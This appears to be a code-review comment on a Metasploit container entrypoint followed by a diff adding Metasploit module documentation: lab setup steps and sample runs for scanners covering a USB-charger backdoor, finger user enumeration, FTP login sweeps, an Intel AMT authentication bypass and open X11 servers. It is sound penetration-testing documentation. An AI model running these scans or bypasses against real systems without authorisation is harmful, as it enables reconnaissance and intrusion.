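Review bot: `lhost = %x(hostname -i)` keeps the trailing newline (and, on hosts with several addresses, a space-separated list), and that is interpolated verbatim into `setg LHOST #{lhost}`; use `lhost = %x(hostname -i).split.first.to_s` so a single clean address is set, and guard it with `run_single("setg LHOST #{lhost}") unless lhost.empty?`. The old `setg LPORT` line is removed and nothing replaces it, so `LPORT` from the environment is no longer honoured — if that is intended, say so in a comment; otherwise keep `run_single("setg LPORT #{ENV['LPORT']}") if ENV['LPORT']`. Both values go straight from the environment into a console command string, which is acceptable for a container entrypoint but deserves a one-line comment noting the trust assumption. The unchanged `db_connect` line strips `postrgres://` (misspelled), so the scheme is never removed from `DATABASE_URL`; pre-existing, but worth a follow-up.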
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
## Vulnerable Application
|
||||
|
||||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
|
||||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
|
||||
|
||||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the vulnerable software
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect`
|
||||
4. Do: `set rhosts`
|
||||
5. Do: `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the backdoor
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
|
||||
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
|
||||
msf auxiliary(energizer_duo_detect) > set THREADS 256
|
||||
msf auxiliary(energizer_duo_detect) > run
|
||||
|
||||
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
|
||||
```
|
|
@ -0,0 +1,50 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Chargen is a debugging and measurement tool and a character generator service. Often `chargen` is included in `xinetd`,
|
||||
along with `echo`, `time`, `daytime`, and `discard`.
|
||||
While its possible to run chargen on TCP, the most common implementation is UDP.
|
||||
|
||||
The following was done on Kali linux:
|
||||
|
||||
1. `apt-get install xinetd`
|
||||
2. edit `/etc/xinetd.d/chargen` and changed `disabled = yes` to `disabled = no`. The first one is for `TCP` and the second is for `UDP`.
|
||||
3. Restart the service: `service xinetd restart`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install and configure chargen
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/chargen/chargen_probe`
|
||||
4. Do: `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the configuration from these docs
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/chargen/chargen_probe
|
||||
msf auxiliary(chargen_probe) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf auxiliary(chargen_probe) > set verbose true
|
||||
verbose => true
|
||||
msf auxiliary(chargen_probe) > run
|
||||
|
||||
[*] 127.0.0.1:19 - Response: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
|
||||
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
|
||||
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
|
||||
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
|
||||
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
|
||||
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
|
||||
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
|
||||
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
|
||||
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
|
||||
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
|
||||
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
|
||||
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
|
||||
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
|
||||
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
|
||||
|
||||
[+] 127.0.0.1:19 answers with 1022 bytes (headers + UDP payload)
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,58 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Finger is an older protocol which displays information about users on a machine. This can be abused to verify if a user is valid on that machine.
|
||||
The protocol itself was designed in the 1970s, and is run in cleartext.
|
||||
|
||||
The following was done on Kali linux:
|
||||
|
||||
1. `apt-get install inetutils-inetd fingerd`
|
||||
2. Start the service: `/etc/init.d/inetutils-inetd start`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install fingerd
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/finger/finger_users`
|
||||
4. Do: `set rhosts`
|
||||
5. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
**USERS_FILE**
|
||||
|
||||
The USERS_FILE is a newline delimited list of users and defaults to `unix_users.txt` included with metasploit.
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the configuration from these docs
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/finger/finger_users
|
||||
msf auxiliary(finger_users) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf auxiliary(finger_users) > run
|
||||
|
||||
[+] 127.0.0.1:79 - 127.0.0.1:79 - Found user: root
|
||||
[+] 127.0.0.1:79 - 127.0.0.1:79 Users found: root
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Confirming using NMAP
|
||||
|
||||
Utilizing the [finger](https://nmap.org/nsedoc/scripts/finger.html) script
|
||||
|
||||
```
|
||||
# nmap -p 79 --script finger 127.0.0.1
|
||||
|
||||
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-26 19:35 EDT
|
||||
Nmap scan report for localhost (127.0.0.1)
|
||||
Host is up (0.000039s latency).
|
||||
PORT STATE SERVICE
|
||||
79/tcp open finger
|
||||
| finger: Login Name Tty Idle Login Time Office Office Phone\x0D
|
||||
| root root tty2 16d Apr 10 19:17 (:0)\x0D
|
||||
|_root root *pts/3 1d Apr 25 19:11 (192.168.2.175)\x0D
|
||||
|
||||
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
|
||||
```
|
|
@ -0,0 +1,93 @@
|
|||
## Description
|
||||
|
||||
This module allows us to scan through a series of IP Addresses and provide details whether anonymous access is allowed or not in that particular FTP server. By default, anonymous access is not allowed by the FTP server.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
### Install ftp server on Kali Linux:
|
||||
|
||||
1. ```apt-get install vsftpd```
|
||||
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
|
||||
|
||||
```
|
||||
local_enable=YES
|
||||
write_enable=YES
|
||||
chroot_list_enable=YES
|
||||
chroot_list_file=/etc/vsftpd.chroot_list
|
||||
```
|
||||
|
||||
3. **IMPORTANT:** For allowing anonymous access set ```anonymous_enable=YES```
|
||||
4. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
|
||||
5. ```service vsftpd start```
|
||||
|
||||
### Installing FTP for IIS 7.5 in Windows:
|
||||
|
||||
#### IIS 7.5 for Windows Server 2008 R2:
|
||||
|
||||
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
|
||||
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
|
||||
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
|
||||
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
|
||||
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
6. Click Next.
|
||||
7. On the Confirm Installation Selections page, click Install.
|
||||
8. On the Results page, click Close.
|
||||
|
||||
|
||||
|
||||
#### IIS 7.5 for Windows 7:
|
||||
|
||||
1. On the taskbar, click Start, and then click Control Panel.
|
||||
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
|
||||
3. Expand Internet Information Services, then FTP Server.
|
||||
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
5. Click OK.
|
||||
|
||||
#### Enabling anonymous login on IIS
|
||||
|
||||
1. Open IIS Manager and navigate to the level you want to manage. ...
|
||||
2. In Features View, double-click Authentication.
|
||||
3. On the Authentication page, select Anonymous Authentication.
|
||||
4. In the Actions pane, click Enable to use Anonymous authentication with the default settings.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/ftp/anonymous```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [IP]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
|
||||
### On vsFTPd 3.0.3 on Kali
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ftp/anonymous
|
||||
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf auxiliary(anonymous) > set RPORT 21
|
||||
RPORT => 21
|
||||
msf auxiliary(anonymous) > exploit
|
||||
|
||||
[+] 127.0.0.1:21 - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(anonymous) >
|
||||
```
|
||||
|
||||
## Confirming using NMAP
|
||||
|
||||
```
|
||||
root@kali:~# nmap -sV -sC 127.0.0.1 -p 21
|
||||
|
||||
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 22:58 IST
|
||||
Nmap scan report for localhost (127.0.0.1)
|
||||
Host is up (0.000035s latency).
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp vsftpd 3.0.3
|
||||
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
|
||||
Service Info: OS: Unix
|
||||
|
||||
root@kali:~#
|
||||
```
|
||||
|
|
@ -0,0 +1,62 @@
|
|||
## Description
|
||||
|
||||
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
### Install ftp server on Kali Linux:
|
||||
|
||||
1. ```apt-get install vsftpd```
|
||||
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
|
||||
|
||||
```
|
||||
local_enable=YES
|
||||
write_enable=YES
|
||||
chroot_list_enable=YES
|
||||
chroot_list_file=/etc/vsftpd.chroot_list
|
||||
```
|
||||
|
||||
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
|
||||
4. ```service vsftpd start```
|
||||
|
||||
### Installing FTP for IIS 7.5 in Windows:
|
||||
|
||||
#### IIS 7.5 for Windows Server 2008 R2:
|
||||
|
||||
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
|
||||
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
|
||||
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
|
||||
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
|
||||
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
6. Click Next.
|
||||
7. On the Confirm Installation Selections page, click Install.
|
||||
8. On the Results page, click Close.
|
||||
|
||||
#### IIS 7.5 for Windows 7:
|
||||
|
||||
1. On the taskbar, click Start, and then click Control Panel.
|
||||
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
|
||||
3. Expand Internet Information Services, then FTP Server.
|
||||
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
5. Click OK.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/ftp/ftp_login```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [IP]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
```
|
||||
msf> use auxiliary/scanner/ftp/ftp_login
|
||||
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org
|
||||
msf auxiliary(ftp_login) > set USERNAME ftp
|
||||
msf auxiliary(ftp_login) > set PASSWORD hello@metasploit.com
|
||||
msf auxiliary(ftp_login) > run
|
||||
[*] 129.128.5.191:21 - Starting FTP login sweep
|
||||
[+] 129.128.5.191:21 - LOGIN SUCCESSFUL: ftp:hello@metasploit.com
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(ftp_login) >
|
||||
```
|
|
@ -0,0 +1,80 @@
|
|||
## Description
|
||||
|
||||
This module allows us to scan through a series of IP Addresses and provide details about the version of ftp running on that address.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
### Install ftp server on Kali Linux:
|
||||
|
||||
1. ```apt-get install vsftpd```
|
||||
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
|
||||
|
||||
```
|
||||
local_enable=YES
|
||||
write_enable=YES
|
||||
chroot_list_enable=YES
|
||||
chroot_list_file=/etc/vsftpd.chroot_list
|
||||
```
|
||||
|
||||
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
|
||||
4. ```service vsftpd start```
|
||||
|
||||
### Installing FTP for IIS 7.5 in Windows:
|
||||
|
||||
#### IIS 7.5 for Windows Server 2008 R2:
|
||||
|
||||
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
|
||||
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
|
||||
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
|
||||
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
|
||||
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
6. Click Next.
|
||||
7. On the Confirm Installation Selections page, click Install.
|
||||
8. On the Results page, click Close.
|
||||
|
||||
#### IIS 7.5 for Windows 7:
|
||||
|
||||
1. On the taskbar, click Start, and then click Control Panel.
|
||||
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
|
||||
3. Expand Internet Information Services, then FTP Server.
|
||||
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
|
||||
5. Click OK.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/ftp/ftp_version```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [IP]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
|
||||
### On vsFTPd 3.0.3 on Kali
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ftp/ftp_version
|
||||
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf auxiliary(ftp_version) > set RPORT 21
|
||||
RPORT => 21
|
||||
msf auxiliary(ftp_version) > exploit
|
||||
|
||||
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(ftp_version) >
|
||||
```
|
||||
## Confirming using NMAP
|
||||
```
|
||||
root@kali:~# nmap -sV 127.0.0.1 -p21
|
||||
|
||||
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 23:11 IST
|
||||
Nmap scan report for localhost (127.0.0.1)
|
||||
Host is up (0.000035s latency).
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp vsftpd 3.0.3
|
||||
Service Info: OS: Unix
|
||||
|
||||
root@kali:~#
|
||||
|
||||
```
|
|
@ -0,0 +1,102 @@
|
|||
## Description
|
||||
|
||||
This module is a http crawler, it will browse the links recursively from the
|
||||
web site. If you have loaded a database plugin and connected to a database,
|
||||
this module will report web pages and web forms.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
You can use any web application to test the crawler.
|
||||
|
||||
## Options
|
||||
|
||||
**URI**
|
||||
|
||||
Default path is `/`
|
||||
|
||||
**DirBust**
|
||||
|
||||
Bruteforce common url path, default is `true` but may generate noise in reports.
|
||||
|
||||
**HttpPassword**, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**
|
||||
|
||||
You can add some login information
|
||||
|
||||
**UserAgent**
|
||||
|
||||
Default User Agent is `Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/http/crawler```
|
||||
2. Do: ```set RHOST [IP]```
|
||||
3. Do: ```set RPORT [PORT]```
|
||||
4. Do: ```set URI [PATH]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Sample Output
|
||||
|
||||
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
|
||||
```
|
||||
msf> use auxiliary/scanner/http/crawler
|
||||
msf auxiliary(crawler) > set RHOST 127.0.0.1
|
||||
msf auxiliary(crawler) > set RPORT 8080
|
||||
msf auxiliary(crawler) > set URI /webgoat/
|
||||
msf auxiliary(crawler) > set DirBust false
|
||||
msf auxiliary(crawler) > run
|
||||
[*] Crawling http://127.0.0.1:8008/webgoat/...
|
||||
[*] [00001/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/ -> /webgoat/login.mvc
|
||||
[*] [00002/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc
|
||||
[*] FORM: POST /webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
|
||||
[-] [00003/00500] 404 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/images/favicon.ico
|
||||
[*] [00004/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/plugins/bootstrap/css/bootstrap.min.css
|
||||
[*] [00005/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/font-awesome.min.css
|
||||
[*] [00006/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/animate.css
|
||||
[*] [00007/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202 -> /webgoat/login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202?error
|
||||
[*] [00008/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202?error
|
||||
[*] FORM: GET /webgoat/login.mvc
|
||||
[*] FORM: POST /webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
|
||||
[*] [00009/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/main.css
|
||||
[*] [00010/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/start.mvc -> http://127.0.0.1:8008/webgoat/login.mvc
|
||||
[*] [00011/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc
|
||||
[*] FORM: POST /webgoat/j_spring_security_check
|
||||
[*] Crawl of http://127.0.0.1:8008/webgoat/ complete
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Follow-on: Wmap
|
||||
|
||||
As you see, the result is not very user friendly...
|
||||
|
||||
But you can view a tree of your website with the Wmap plugin. Simply run :
|
||||
|
||||
```
|
||||
msf auxiliary(crawler) > load wmap
|
||||
msf auxiliary(crawler) > wmap_sites -l
|
||||
[*] Available sites
|
||||
===============
|
||||
|
||||
Id Host Vhost Port Proto # Pages # Forms
|
||||
-- ---- ----- ---- ----- ------- -------
|
||||
0 127.0.0.1 127.0.0.1 8080 http 70 80
|
||||
|
||||
|
||||
msf auxiliary(crawler) > wmap_sites -s 0
|
||||
|
||||
[127.0.0.1] (127.0.0.1)
|
||||
└── webgoat (7)
|
||||
├── css (3)
|
||||
│ ├── animate.css
|
||||
│ ├── font-awesome.min.css
|
||||
│ └── main.css
|
||||
├── j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
|
||||
├── login.mvc
|
||||
├── login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
|
||||
├── plugins (1)
|
||||
│ └── bootstrap (1)
|
||||
│ └── css (1)
|
||||
│ └── bootstrap.min.css
|
||||
├── start.mvc
|
||||
└── j_spring_security_check
|
||||
|
||||
```
|
|
@ -0,0 +1,36 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits vulnerable versions of the Intel Management Engine (ME) firmware present Intel Core CPU 1st through 7th generations that allows authentication bypass and full control over the target machine, if the Active Management Technology feature is enabled and networking is configured.
|
||||
|
||||
**Vulnerable Application Installation Steps**
|
||||
|
||||
Enable the feature in the firmware setup screen on any vulnerable target machine. The module has been tested on HP and Lenovo desktops and laptops.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
A successful run of the module will look like this:
|
||||
|
||||
|
||||
```
|
||||
msf auxiliary(telnet_version) > use auxiliary/scanner/http/intel_amt_digest_bypass
|
||||
msf auxiliary(intel_amt_digest_bypass) > show options
|
||||
|
||||
Module options (auxiliary/scanner/http/intel_amt_digest_bypass):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target address range or CIDR identifier
|
||||
RPORT 16992 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
THREADS 1 yes The number of concurrent threads
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
msf auxiliary(intel_amt_digest_bypass) > set rhosts 192.168.1.18
|
||||
rhosts => 192.168.1.18
|
||||
msf auxiliary(intel_amt_digest_bypass) > run
|
||||
|
||||
[+] 192.168.1.18:16992 - Vulnerable to CVE-2017-5869 {"Computer model"=>"30A70051US", "Manufacturer"=>"LENOVO", "Version"=>"A4KT80AUS", "Serial number"=>" ", "System ID"=>"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", "Product name"=>"To be filled by O.E.M.", "Asset tag"=>" ", "Replaceable?"=>"Yes", "Vendor"=>"LENOVO", "Release date"=>"09/23/2015"}
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,52 @@
|
|||
## Description
|
||||
|
||||
This module will detect `robots.txt` files on web servers and analyze its content.
|
||||
The `robots.txt` file is a file which is supposed to be honored by web crawlers
|
||||
and bots, as locations which are not to be indexed or specifically called out
|
||||
to be indexed. This can be abused to reveal interesting information about areas
|
||||
of the site which an admin may not want to be public knowledge.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
You can use almost any web application to test this module, as `robots.txt`
|
||||
is extremely common.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: `use auxiliary/scanner/http/robots_txt`
|
||||
2. Do: `set rhosts [ip]`
|
||||
3. Do: `run`
|
||||
4. You should get the `robots.txt` file content
|
||||
|
||||
## Options
|
||||
|
||||
**PATH**
|
||||
|
||||
You can set the test path where the scanner will try to find `robots.txt` file.
|
||||
Default is `/`
|
||||
|
||||
## Sample Output
|
||||
```
|
||||
msf> use auxiliary/scanner/http/robots_txt
|
||||
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238
|
||||
msf auxiliary(robots_txt) > run
|
||||
[*] [172.217.19.238] /robots.txt found
|
||||
[+] Contents of Robots.txt:
|
||||
User-agent: *
|
||||
Disallow: /search
|
||||
Allow: /search/about
|
||||
Disallow: /sdch
|
||||
Disallow: /groups
|
||||
Disallow: /index.html?
|
||||
Disallow: /?
|
||||
```
|
||||
|
||||
[...Truncated...]
|
||||
|
||||
```
|
||||
User-agent: facebookexternalhit
|
||||
Allow: /imgres
|
||||
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
@ -0,0 +1,198 @@
|
|||
## Vulnerable Application
|
||||
|
||||
X11 (X Window System) is a graphical windowing system most common on unix/linux, although implementations may be found in windows
|
||||
with software such as Hummingbird Exceed X Server. The service can accept connections from any users when misconfigured
|
||||
which is done with the command `xhost +`.
|
||||
|
||||
### Ubuntu 10.04
|
||||
|
||||
1. `sudo nano /etc/gdm/gdm.schemas`
|
||||
2. Find:
|
||||
|
||||
```
|
||||
<schema>
|
||||
<key>security/DisallowTCP</key>
|
||||
<signature>b</signature>
|
||||
<default>true</default>
|
||||
</schema>
|
||||
```
|
||||
- Change `true` to `false`
|
||||
|
||||
3. logout or reboot
|
||||
4. Verification: ```sudo netstat -antp | grep 6000```
|
||||
|
||||
```
|
||||
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
|
||||
```
|
||||
|
||||
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Ubuntu 12.04, 14.04
|
||||
|
||||
1. `sudo nano /etc/lightdm/lightdm.conf`
|
||||
2. Under the `[SeatDefaults]` area, add:
|
||||
|
||||
```
|
||||
xserver-allow-tcp=true
|
||||
allow-guest=true
|
||||
```
|
||||
|
||||
3. logout or reboot
|
||||
4. Verification: ```sudo netstat -antp | grep 6000```
|
||||
|
||||
```
|
||||
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
|
||||
```
|
||||
|
||||
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Ubuntu 16.04
|
||||
|
||||
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
|
||||
|
||||
### Fedora 15
|
||||
|
||||
1. `vi /etc/gdm/custom.conf`
|
||||
2. Under the `[security]` area, add:
|
||||
|
||||
```
|
||||
DisallowTCP=false
|
||||
```
|
||||
|
||||
3. logout/reboot
|
||||
4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Solaris 10
|
||||
|
||||
1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true`
|
||||
2. `svc disable cde-login`
|
||||
3. `svc enable cde-login`
|
||||
4. `xhost +`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install and configure X11
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/x11/open_x11`
|
||||
4. Do: `set rhosts [IPs]`
|
||||
5. Do: `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against Ubuntu 14.04 (192.168.2.75), Ubuntu 16.04 (192.168.2.26), and Solaris 10 (192.168.2.32)
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/x11/open_x11
|
||||
msf auxiliary(open_x11) > set rhosts 192.168.2.75 192.168.2.26
|
||||
rhosts => 192.168.2.75 192.168.2.26
|
||||
msf auxiliary(open_x11) > run
|
||||
|
||||
[+] 192.168.2.75:6000 - 192.168.2.75 Open X Server (The X.Org Foundation)
|
||||
[*] Scanned 1 of 3 hosts (33% complete)
|
||||
[+] 192.168.2.26:6000 - 192.168.2.26 Open X Server (The X.Org Foundation)
|
||||
[*] Scanned 2 of 3 hosts (66% complete)
|
||||
[+] 192.168.2.32:6000 - 192.168.2.32 Open X Server (Sun Microsystems, Inc.)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Confirming
|
||||
|
||||
The following are other industry tools which can also be used.
|
||||
|
||||
### [nmap](https://nmap.org/nsedoc/scripts/x11-access.html)
|
||||
|
||||
```
|
||||
# nmap -p 6000 --script=x11-access 192.168.2.26,75
|
||||
|
||||
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-23 13:15 EDT
|
||||
Nmap scan report for ubuntu-desktop-16 (192.168.2.26)
|
||||
Host is up (0.0021s latency).
|
||||
PORT STATE SERVICE
|
||||
6000/tcp open X11
|
||||
|_x11-access: X server access is granted
|
||||
MAC Address: 00:0C:29:60:27:F9 (VMware)
|
||||
|
||||
Nmap scan report for ubuntu-desktop-14 (192.168.2.75)
|
||||
Host is up (0.0021s latency).
|
||||
PORT STATE SERVICE
|
||||
6000/tcp open X11
|
||||
|_x11-access: X server access is granted
|
||||
MAC Address: 00:0C:29:0E:C4:6E (VMware)
|
||||
```
|
||||
|
||||
### xdpyinfo
|
||||
|
||||
This is one of the standard linux tools to get info on an X display.
|
||||
|
||||
```
|
||||
# xdpyinfo -display 192.168.2.75:0 | head -n 5
|
||||
|
||||
